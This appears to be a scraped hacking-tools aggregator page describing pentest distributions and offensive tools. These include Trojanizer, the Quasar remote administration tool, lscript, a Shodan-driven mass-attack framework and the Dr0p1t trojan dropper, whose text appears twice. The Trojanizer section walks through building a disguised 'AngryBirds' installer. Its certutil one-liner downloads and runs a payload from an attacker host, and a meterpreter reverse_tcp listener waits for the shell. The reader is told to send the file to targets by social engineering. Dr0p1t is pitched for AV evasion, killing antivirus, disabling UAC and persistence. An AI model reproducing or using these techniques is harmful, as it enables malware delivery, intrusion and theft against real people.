BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time).
To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1).
Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior'
(execute the payload in background, while the legit application executes in foreground).
DEPENDENCIES (backend applications) Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine) "Trojanizer.sh will download/install all dependencies as they are needed" It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.
PAYLOADS (agents) ACCEPTED .exe | .bat | .vbs | .ps1 "All payloads that windows/SFX can auto-extract-execute" HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed. LEGIT APPLICATIONS ACCEPTED (decoys) .exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc .. "All applications that windows/SFX can auto-extract-execute" ADVANCED SETTINGS
Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configurated before running the main tool (Trojanizer.sh)
-- Presetup advanced option
Trojanizer can be configurated to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allow users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs in target system. If active, trojanizer will asks (zenity sandbox) for the command to be executed
-- single_file_execution
Lets look at the follow scenario: You have a dll payload to input that you need to execute upon extraction, but sfx archives can not execute directly dll files, This setting allow users to input one batch script(.bat) that its going to be used to execute the dll payload. All that Trojanizer needs to Do its to instruct the SFX archive to extract both files and them execute the script.bat
single_file_execution switch default behavior its to compress the two files inputed by user but only execute one of them at extraction time (the 2º file inputed will be executed) ...
TROJANIZER AND APPL WHITELISTING BYPASSES
A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries. Windows oneliners to download remote payload and execute arbitrary code
The follow exercise describes how to use trojanizer 'single_file_execution' and 'Presetup' advanced switchs to drop (remote download) and execute any payload using 'certutil' or 'powershell' appl_whitelisting_bypass oneliners ...
2º - copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start
3º - edit Trojanizer 'settings' file and activate:
PRE_SETUP=ON
SINGLE_EXEC=ON
4º - running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico
5º - start a listenner, and send the sfx archive to target using social enginnering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
When the sfx archive its executed, it will download payload.exe from our apache2 webserver to target and execute it before extract 'screenshot.png' and 'AngryBirds.exe' (last one will be executed to serve as decoy) The follow oneliner uses 'powershell(Downloadfile+start)' method to achieve the same as previous 'certutil' exercise ..
Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.
Features
TCP network stream (IPv4 & IPv6 support)
Fast network serialization (NetSerializer)
Compressed (QuickLZ) & Encrypted (AES-128) communication
Multi-Threaded
UPnP Support
No-Ip.com Support
Visit Website (hidden & visible)
Show Messagebox
Task Manager
File Manager
Startup Manager
Remote Desktop
Remote Webcam
Remote Shell
Download & Execute
Upload & Execute
System Information
Computer Commands (Restart, Shutdown, Standby)
Keylogger (Unicode Support)
Reverse Proxy (SOCKS5)
Password Recovery (Common Browsers and FTP Clients)
Open the project in Visual Studio and click build, or use one of the batch files included in the root directory.
Batch file
Description
build-debug.bat
Builds the application using the debug configuration (for testing)
build-release.bat
Builds the application using the release configuration (for publishing)
Building a client
Build configuration
Description
debug configuration
The pre-defined Settings.cs will be used. The client builder does not work in this configuration. You can execute the client directly with the specified settings.
release configuration
Use the client builder to build your client otherwise it is going to crash.
This is a script that automates many procedures about wifi penetration and hacking. Features Enabling-Disabling interfaces faster Changing Mac faster Anonymizing yourself faster View your public IP faster View your MAC faster TOOLS
You can install whichever tool(s) you want from within lscript!
Fluxion by Deltaxflux
WifiTe by derv82
Wifiphisher by Dan McInerney
Zatacker by LawrenceThePentester
Morpheus by Pedro ubuntu [ r00t-3xp10it ]
Osrframework by i3visio
Hakku by 4shadoww
Trity by Toxic-ig
Cupp by Muris Kurgas
Dracnmap by Edo -maland-
Fern Wifi Cracker by Savio-code
Kichthemout by Nikolaos Kamarinakis & David SchĂźtz
BeeLogger by Alisson Moretto - 4w4k3
Ghost-Phisher by Savio-code
Mdk3-master by Musket Developer
Anonsurf by Und3rf10w
The Eye by EgeBalci
Airgeddon by v1s1t0r1sh3r3
Xerxes by zanyarjamal
Ezsploit by rand0m1ze
Katana framework by PowerScript
4nonimizer by Hackplayers
Sslstrip2 by LeonardoNve
Dns2proxy by LeonardoNve
Pupy by n1nj4sec
Zirikatu by pasahitz
TheFatRat by Sceetsec
Angry IP Scanner by Anton Keks
Sniper by 1N3
ReconDog by UltimateHackers
RED HAWK by Tuhinshubhra
Routersploit by Reverse shell
CHAOS by Tiagorlampert
Winpayloads by Ncc group
Email spoofing
Metasploit automation (create payloads,listeners,save listeners for later etc...)
Auto eternalblue exploiting (check on ks) -> hidden shortcuts
How to install (make sure you are a root user) Be carefull.If you download it as a .zip file, it will not run.Make sure to follow these simple instructions.
cd
git clone https://github.com/arismelachroinos/lscript.git
cd lscript
chmod +x install.sh
./install.sh
How to run it
(make sure you are a root user)
open terminal
type "l"
press enter
(Not even "lazy"!! Just "l"! The less you type , the better!)
How to uninstall
cd /root/lscript
./uninstall.sh
rmdir -r /root/lscript
How to update
Run the script
Type "update"
Things to keep in mind 1)you should be a root user to run the script 2)you should contact me if something doesnt work (Write it on the "issues" tab at the top) 3)you should contact me if you want a feature to be added (Write it on the "issues" tab at the top) Video
it's a framework written in python [2.7] that is being made specially for blind attacking , ie : attacking random targets with common security issues , targets are generated by the hackers search engine "shodan" and vulnerable hosts are hacked in an automated way .
this framework is completely "neutral" ie: it's not based on shodan API and it has total dependence on web scraping , ie: the only limit on what you can do with it is your immagination as a tester & our programming skills as contributers/owners .
how to use BAF ?
fire up a terminal and sudo apt-get update && apt-get upgrade && apt-get dist-upgrade
Viproy Voip Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 is released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extentions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analyse modules.
Have you ever heard about trojan droppers ? In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;) Features
Framework works with Windows and Linux
Download executable on target system and execute it silently..
The executable size small compared to other droppers generated the same way
Self destruct function so that the dropper will kill and delete itself after finishing it work
Adding executable after downloading it to startup
Adding executable after downloading it to task scheduler ( UAC not matters )
Finding and killing the antivirus before running the malware
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
The ability to disable UAC
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
Choose an icon for the dropper after creating it
Screenshots On Windows
On Linux (Backbox)
Help menu
Usage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
--nouac Disable UAC on victim device
--nocompile Tell the framework to not compile the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller
Have you ever heard about trojan droppers ? In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;) Features
Framework works with Windows and Linux
Download executable on target system and execute it silently..
The executable size small compared to other droppers generated the same way
Self destruct function so that the dropper will kill and delete itself after finishing it work
Adding executable after downloading it to startup
Adding executable after downloading it to task scheduler ( UAC not matters )
Finding and killing the antivirus before running the malware
Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
The ability to disable UAC
In running powershell scripts it can bypass execution policy
Using UPX to compress the dropper after creating it
Choose an icon for the dropper after creating it
Screenshots On Windows
On Linux (Backbox)
Help menu
Usage: Dr0p1t.py Malware_Url [Options]
options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
--nouac Disable UAC on victim device
--nocompile Tell the framework to not compile the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller
0Day to Buy
Anti-Spy
Exposed Leak
#Op
Cyber War
Home
Hacking Tools
Hacking Online Tools
Pr1v8
Google Hacking DB
All
